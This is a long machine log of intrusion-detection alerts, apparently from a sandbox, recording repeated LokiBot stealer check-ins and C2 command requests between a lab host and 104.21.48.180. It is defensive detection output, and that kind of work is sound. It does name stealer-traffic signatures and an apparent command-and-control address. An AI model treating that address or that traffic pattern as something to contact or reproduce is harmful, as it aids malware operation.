                        2025-02-20T16:16:54.424082+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549884104.21.48.180TCP
                        2025-02-20T16:16:54.424082+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549884104.21.48.180TCP
                        2025-02-20T16:16:54.583144+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549896104.21.48.180TCP
                        2025-02-20T16:16:54.583144+01002025381ET MALWARE LokiBot Checkin1192.168.2.549896104.21.48.180TCP
                        2025-02-20T16:16:54.583144+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549896104.21.48.180TCP
                        2025-02-20T16:16:55.283690+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549896104.21.48.180TCP
                        2025-02-20T16:16:55.283690+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549896104.21.48.180TCP
                        2025-02-20T16:16:55.288828+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.549896TCP
                        2025-02-20T16:16:55.459859+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549902104.21.48.180TCP
                        2025-02-20T16:16:55.459859+01002025381ET MALWARE LokiBot Checkin1192.168.2.549902104.21.48.180TCP
                        2025-02-20T16:16:55.459859+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549902104.21.48.180TCP
                        2025-02-20T16:16:56.213457+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549902104.21.48.180TCP
                        2025-02-20T16:16:56.213457+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549902104.21.48.180TCP
                        2025-02-20T16:16:56.396860+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549909104.21.48.180TCP
                        2025-02-20T16:16:56.396860+01002025381ET MALWARE LokiBot Checkin1192.168.2.549909104.21.48.180TCP
                        2025-02-20T16:16:56.396860+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549909104.21.48.180TCP
                        2025-02-20T16:16:57.156001+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549909104.21.48.180TCP
                        2025-02-20T16:16:57.156001+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549909104.21.48.180TCP
                        2025-02-20T16:16:57.161044+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.549909TCP
                        2025-02-20T16:16:57.602808+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549919104.21.48.180TCP
                        2025-02-20T16:16:57.602808+01002025381ET MALWARE LokiBot Checkin1192.168.2.549919104.21.48.180TCP
                        2025-02-20T16:16:57.602808+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549919104.21.48.180TCP
                        2025-02-20T16:16:58.381726+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549919104.21.48.180TCP
                        2025-02-20T16:16:58.381726+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549919104.21.48.180TCP
                        2025-02-20T16:16:58.386806+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.549919TCP
                        2025-02-20T16:16:58.568401+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549925104.21.48.180TCP
                        2025-02-20T16:16:58.568401+01002025381ET MALWARE LokiBot Checkin1192.168.2.549925104.21.48.180TCP
                        2025-02-20T16:16:58.568401+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549925104.21.48.180TCP
                        2025-02-20T16:16:59.199663+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549925104.21.48.180TCP
                        2025-02-20T16:16:59.199663+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549925104.21.48.180TCP
                        2025-02-20T16:16:59.204711+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.549925TCP
                        2025-02-20T16:16:59.383755+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549932104.21.48.180TCP
                        2025-02-20T16:16:59.383755+01002025381ET MALWARE LokiBot Checkin1192.168.2.549932104.21.48.180TCP
                        2025-02-20T16:16:59.383755+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549932104.21.48.180TCP
                        2025-02-20T16:17:00.166443+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549932104.21.48.180TCP
                        2025-02-20T16:17:00.166443+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549932104.21.48.180TCP
                        2025-02-20T16:17:00.171449+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.549932TCP
                        2025-02-20T16:17:00.583736+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549940104.21.48.180TCP
                        2025-02-20T16:17:00.583736+01002025381ET MALWARE LokiBot Checkin1192.168.2.549940104.21.48.180TCP
                        2025-02-20T16:17:00.583736+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549940104.21.48.180TCP
                        2025-02-20T16:17:01.361596+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549940104.21.48.180TCP
                        2025-02-20T16:17:01.361596+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549940104.21.48.180TCP
                        2025-02-20T16:17:01.367654+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.549940TCP
                        2025-02-20T16:17:01.521989+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549948104.21.48.180TCP
                        2025-02-20T16:17:01.521989+01002025381ET MALWARE LokiBot Checkin1192.168.2.549948104.21.48.180TCP
                        2025-02-20T16:17:01.521989+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549948104.21.48.180TCP
                        2025-02-20T16:17:02.525094+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549948104.21.48.180TCP
                        2025-02-20T16:17:02.525094+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549948104.21.48.180TCP
                        2025-02-20T16:17:02.530179+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.549948TCP
                        2025-02-20T16:17:02.747718+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549956104.21.48.180TCP
                        2025-02-20T16:17:02.747718+01002025381ET MALWARE LokiBot Checkin1192.168.2.549956104.21.48.180TCP
                        2025-02-20T16:17:02.747718+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549956104.21.48.180TCP
                        2025-02-20T16:17:03.405067+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549956104.21.48.180TCP
                        2025-02-20T16:17:03.405067+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549956104.21.48.180TCP
                        2025-02-20T16:17:03.410351+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.549956TCP
                        2025-02-20T16:17:03.579100+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549962104.21.48.180TCP
                        2025-02-20T16:17:03.579100+01002025381ET MALWARE LokiBot Checkin1192.168.2.549962104.21.48.180TCP
                        2025-02-20T16:17:03.579100+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549962104.21.48.180TCP
                        2025-02-20T16:17:04.241603+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549962104.21.48.180TCP
                        2025-02-20T16:17:04.241603+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549962104.21.48.180TCP
                        2025-02-20T16:17:04.246628+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.549962TCP
                        2025-02-20T16:17:04.418454+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549969104.21.48.180TCP
                        2025-02-20T16:17:04.418454+01002025381ET MALWARE LokiBot Checkin1192.168.2.549969104.21.48.180TCP
                        2025-02-20T16:17:04.418454+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549969104.21.48.180TCP
                        2025-02-20T16:17:05.198591+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549969104.21.48.180TCP
                        2025-02-20T16:17:05.198591+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549969104.21.48.180TCP
                        2025-02-20T16:17:05.203964+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.549969TCP
                        2025-02-20T16:17:05.383888+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549975104.21.48.180TCP
                        2025-02-20T16:17:05.383888+01002025381ET MALWARE LokiBot Checkin1192.168.2.549975104.21.48.180TCP
                        2025-02-20T16:17:05.383888+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549975104.21.48.180TCP
                        2025-02-20T16:17:06.163154+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549975104.21.48.180TCP
                        2025-02-20T16:17:06.163154+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549975104.21.48.180TCP
                        2025-02-20T16:17:06.168198+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.549975TCP
                        2025-02-20T16:17:06.341337+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549983104.21.48.180TCP
                        2025-02-20T16:17:06.341337+01002025381ET MALWARE LokiBot Checkin1192.168.2.549983104.21.48.180TCP
                        2025-02-20T16:17:06.341337+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549983104.21.48.180TCP
                        2025-02-20T16:17:07.094201+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549983104.21.48.180TCP
                        2025-02-20T16:17:07.094201+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549983104.21.48.180TCP
                        2025-02-20T16:17:07.257546+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549990104.21.48.180TCP
                        2025-02-20T16:17:07.257546+01002025381ET MALWARE LokiBot Checkin1192.168.2.549990104.21.48.180TCP
                        2025-02-20T16:17:07.257546+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549990104.21.48.180TCP
                        2025-02-20T16:17:08.072232+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549990104.21.48.180TCP
                        2025-02-20T16:17:08.072232+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549990104.21.48.180TCP
                        2025-02-20T16:17:08.077534+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.549990TCP
                        2025-02-20T16:17:08.254281+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549998104.21.48.180TCP
                        2025-02-20T16:17:08.254281+01002025381ET MALWARE LokiBot Checkin1192.168.2.549998104.21.48.180TCP
                        2025-02-20T16:17:08.254281+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549998104.21.48.180TCP
                        2025-02-20T16:17:08.997264+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549998104.21.48.180TCP
                        2025-02-20T16:17:08.997264+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549998104.21.48.180TCP
                        2025-02-20T16:17:09.180238+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550005104.21.48.180TCP
                        2025-02-20T16:17:09.180238+01002025381ET MALWARE LokiBot Checkin1192.168.2.550005104.21.48.180TCP
                        2025-02-20T16:17:09.180238+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550005104.21.48.180TCP
                        2025-02-20T16:17:09.958886+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550005104.21.48.180TCP
                        2025-02-20T16:17:09.958886+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550005104.21.48.180TCP
                        2025-02-20T16:17:09.963959+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.550005TCP
                        2025-02-20T16:17:10.142553+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550011104.21.48.180TCP
                        2025-02-20T16:17:10.142553+01002025381ET MALWARE LokiBot Checkin1192.168.2.550011104.21.48.180TCP
                        2025-02-20T16:17:10.142553+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550011104.21.48.180TCP
                        2025-02-20T16:17:10.955731+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550011104.21.48.180TCP
                        2025-02-20T16:17:10.955731+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550011104.21.48.180TCP
                        2025-02-20T16:17:11.133529+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550020104.21.48.180TCP
                        2025-02-20T16:17:11.133529+01002025381ET MALWARE LokiBot Checkin1192.168.2.550020104.21.48.180TCP
                        2025-02-20T16:17:11.133529+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550020104.21.48.180TCP
                        2025-02-20T16:17:11.760362+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550020104.21.48.180TCP
                        2025-02-20T16:17:11.760362+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550020104.21.48.180TCP
                        2025-02-20T16:17:11.765443+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.550020TCP
                        2025-02-20T16:17:11.941724+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550025104.21.48.180TCP
                        2025-02-20T16:17:11.941724+01002025381ET MALWARE LokiBot Checkin1192.168.2.550025104.21.48.180TCP
                        2025-02-20T16:17:11.941724+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550025104.21.48.180TCP
                        2025-02-20T16:17:12.716591+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550025104.21.48.180TCP
                        2025-02-20T16:17:12.716591+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550025104.21.48.180TCP
                        2025-02-20T16:17:12.721789+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.550025TCP
                        2025-02-20T16:17:12.894688+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550032104.21.48.180TCP
                        2025-02-20T16:17:12.894688+01002025381ET MALWARE LokiBot Checkin1192.168.2.550032104.21.48.180TCP
                        2025-02-20T16:17:12.894688+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550032104.21.48.180TCP
                        2025-02-20T16:17:13.686142+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550032104.21.48.180TCP
                        2025-02-20T16:17:13.686142+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550032104.21.48.180TCP
                        2025-02-20T16:17:13.691158+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.550032TCP
                        2025-02-20T16:17:13.851657+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550034104.21.48.180TCP
                        2025-02-20T16:17:13.851657+01002025381ET MALWARE LokiBot Checkin1192.168.2.550034104.21.48.180TCP
                        2025-02-20T16:17:13.851657+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550034104.21.48.180TCP
                        2025-02-20T16:17:14.617433+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550034104.21.48.180TCP
                        2025-02-20T16:17:14.617433+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550034104.21.48.180TCP
                        2025-02-20T16:17:15.074419+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550035104.21.48.180TCP
                        2025-02-20T16:17:15.074419+01002025381ET MALWARE LokiBot Checkin1192.168.2.550035104.21.48.180TCP
                        2025-02-20T16:17:15.074419+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550035104.21.48.180TCP
                        2025-02-20T16:17:15.895206+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550035104.21.48.180TCP
                        2025-02-20T16:17:15.895206+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550035104.21.48.180TCP
                        2025-02-20T16:17:15.900297+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.550035TCP
                        2025-02-20T16:17:16.073887+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550036104.21.48.180TCP
                        2025-02-20T16:17:16.073887+01002025381ET MALWARE LokiBot Checkin1192.168.2.550036104.21.48.180TCP
                        2025-02-20T16:17:16.073887+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550036104.21.48.180TCP
                        2025-02-20T16:17:16.858040+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550036104.21.48.180TCP
                        2025-02-20T16:17:16.858040+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550036104.21.48.180TCP
                        2025-02-20T16:17:16.863357+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.550036TCP
                        2025-02-20T16:17:17.024522+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550037104.21.48.180TCP
                        2025-02-20T16:17:17.024522+01002025381ET MALWARE LokiBot Checkin1192.168.2.550037104.21.48.180TCP
                        2025-02-20T16:17:17.024522+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550037104.21.48.180TCP
                        2025-02-20T16:17:17.652291+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550037104.21.48.180TCP
                        2025-02-20T16:17:17.652291+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550037104.21.48.180TCP
                        2025-02-20T16:17:17.657918+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.550037TCP
                        2025-02-20T16:17:17.857847+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550038104.21.48.180TCP
                        2025-02-20T16:17:17.857847+01002025381ET MALWARE LokiBot Checkin1192.168.2.550038104.21.48.180TCP
                        2025-02-20T16:17:17.857847+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550038104.21.48.180TCP
                        2025-02-20T16:17:18.508355+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550038104.21.48.180TCP
                        2025-02-20T16:17:18.508355+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550038104.21.48.180TCP
                        2025-02-20T16:17:18.513532+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.550038TCP
                        2025-02-20T16:17:18.678223+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550039104.21.48.180TCP
                        2025-02-20T16:17:18.678223+01002025381ET MALWARE LokiBot Checkin1192.168.2.550039104.21.48.180TCP
                        2025-02-20T16:17:18.678223+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550039104.21.48.180TCP
                        2025-02-20T16:17:19.354313+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550039104.21.48.180TCP
                        2025-02-20T16:17:19.354313+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550039104.21.48.180TCP
                        2025-02-20T16:17:19.359497+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.550039TCP
                        2025-02-20T16:17:19.518205+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550040104.21.48.180TCP
                        2025-02-20T16:17:19.518205+01002025381ET MALWARE LokiBot Checkin1192.168.2.550040104.21.48.180TCP
                        2025-02-20T16:17:19.518205+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550040104.21.48.180TCP
                        2025-02-20T16:17:20.200400+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550040104.21.48.180TCP
                        2025-02-20T16:17:20.200400+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550040104.21.48.180TCP
                        2025-02-20T16:17:20.217454+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.550040TCP
                        2025-02-20T16:17:20.726809+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550041104.21.48.180TCP
                        2025-02-20T16:17:20.726809+01002025381ET MALWARE LokiBot Checkin1192.168.2.550041104.21.48.180TCP
                        2025-02-20T16:17:20.726809+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550041104.21.48.180TCP
                        2025-02-20T16:17:21.485259+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550041104.21.48.180TCP
                        2025-02-20T16:17:21.485259+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550041104.21.48.180TCP
                        2025-02-20T16:17:21.490292+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.550041TCP
                        2025-02-20T16:17:21.644405+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550042104.21.48.180TCP
                        2025-02-20T16:17:21.644405+01002025381ET MALWARE LokiBot Checkin1192.168.2.550042104.21.48.180TCP
                        2025-02-20T16:17:21.644405+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550042104.21.48.180TCP
                        2025-02-20T16:17:22.420852+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550042104.21.48.180TCP
                        2025-02-20T16:17:22.420852+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550042104.21.48.180TCP
                        2025-02-20T16:17:22.425939+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.550042TCP
                        2025-02-20T16:17:22.592381+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550043104.21.48.180TCP
                        2025-02-20T16:17:22.592381+01002025381ET MALWARE LokiBot Checkin1192.168.2.550043104.21.48.180TCP
                        2025-02-20T16:17:22.592381+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550043104.21.48.180TCP
                        2025-02-20T16:17:23.377790+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550043104.21.48.180TCP
                        2025-02-20T16:17:23.377790+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550043104.21.48.180TCP
                        2025-02-20T16:17:23.539726+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550044104.21.48.180TCP
                        2025-02-20T16:17:23.539726+01002025381ET MALWARE LokiBot Checkin1192.168.2.550044104.21.48.180TCP
                        2025-02-20T16:17:23.539726+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550044104.21.48.180TCP
                        2025-02-20T16:17:24.208115+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550044104.21.48.180TCP
                        2025-02-20T16:17:24.208115+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550044104.21.48.180TCP
                        2025-02-20T16:17:24.215858+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.550044TCP
                        2025-02-20T16:17:24.357576+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550045104.21.48.180TCP
                        2025-02-20T16:17:24.357576+01002025381ET MALWARE LokiBot Checkin1192.168.2.550045104.21.48.180TCP
                        2025-02-20T16:17:24.357576+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550045104.21.48.180TCP
                        2025-02-20T16:17:25.027736+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550045104.21.48.180TCP
                        2025-02-20T16:17:25.027736+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550045104.21.48.180TCP
                        2025-02-20T16:17:25.033744+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.550045TCP
                        2025-02-20T16:17:25.195454+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550046104.21.48.180TCP
                        2025-02-20T16:17:25.195454+01002025381ET MALWARE LokiBot Checkin1192.168.2.550046104.21.48.180TCP
                        2025-02-20T16:17:25.195454+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550046104.21.48.180TCP
                        2025-02-20T16:17:25.974095+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550046104.21.48.180TCP
                        2025-02-20T16:17:25.974095+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550046104.21.48.180TCP
                        2025-02-20T16:17:26.144422+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550047104.21.48.180TCP
                        2025-02-20T16:17:26.144422+01002025381ET MALWARE LokiBot Checkin1192.168.2.550047104.21.48.180TCP
                        2025-02-20T16:17:26.144422+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550047104.21.48.180TCP
                        2025-02-20T16:17:26.942992+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550047104.21.48.180TCP
                        2025-02-20T16:17:26.942992+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550047104.21.48.180TCP
                        2025-02-20T16:17:26.947989+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.550047TCP
                        2025-02-20T16:17:27.126923+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550048104.21.48.180TCP
                        2025-02-20T16:17:27.126923+01002025381ET MALWARE LokiBot Checkin1192.168.2.550048104.21.48.180TCP
                        2025-02-20T16:17:27.126923+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550048104.21.48.180TCP
                        2025-02-20T16:17:28.019859+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550048104.21.48.180TCP
                        2025-02-20T16:17:28.019859+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550048104.21.48.180TCP
                        2025-02-20T16:17:28.026548+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.550048TCP
                        2025-02-20T16:17:28.177373+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550049104.21.48.180TCP
                        2025-02-20T16:17:28.177373+01002025381ET MALWARE LokiBot Checkin1192.168.2.550049104.21.48.180TCP
                        2025-02-20T16:17:28.177373+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550049104.21.48.180TCP
                        2025-02-20T16:17:28.864525+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550049104.21.48.180TCP
                        2025-02-20T16:17:28.864525+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550049104.21.48.180TCP
                        2025-02-20T16:17:28.869578+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.550049TCP
                        2025-02-20T16:17:29.043382+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550050104.21.48.180TCP
                        2025-02-20T16:17:29.043382+01002025381ET MALWARE LokiBot Checkin1192.168.2.550050104.21.48.180TCP
                        2025-02-20T16:17:29.043382+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550050104.21.48.180TCP
                        2025-02-20T16:17:29.842211+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550050104.21.48.180TCP
                        2025-02-20T16:17:29.842211+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550050104.21.48.180TCP
                        2025-02-20T16:17:29.847238+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.550050TCP
                        2025-02-20T16:17:30.032338+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550051104.21.48.180TCP
                        2025-02-20T16:17:30.032338+01002025381ET MALWARE LokiBot Checkin1192.168.2.550051104.21.48.180TCP
                        2025-02-20T16:17:30.032338+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550051104.21.48.180TCP
                        2025-02-20T16:17:30.745012+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550051104.21.48.180TCP
                        2025-02-20T16:17:30.745012+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550051104.21.48.180TCP
                        2025-02-20T16:17:30.749987+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.550051TCP
                        2025-02-20T16:17:30.923035+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550052104.21.48.180TCP
                        2025-02-20T16:17:30.923035+01002025381ET MALWARE LokiBot Checkin1192.168.2.550052104.21.48.180TCP
                        2025-02-20T16:17:30.923035+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550052104.21.48.180TCP
                        2025-02-20T16:17:31.660052+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550052104.21.48.180TCP
                        2025-02-20T16:17:31.660052+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550052104.21.48.180TCP
                        2025-02-20T16:17:32.024601+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550053104.21.48.180TCP
                        2025-02-20T16:17:32.024601+01002025381ET MALWARE LokiBot Checkin1192.168.2.550053104.21.48.180TCP
                        2025-02-20T16:17:32.024601+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550053104.21.48.180TCP
                        2025-02-20T16:17:32.778567+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550053104.21.48.180TCP
                        2025-02-20T16:17:32.778567+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550053104.21.48.180TCP
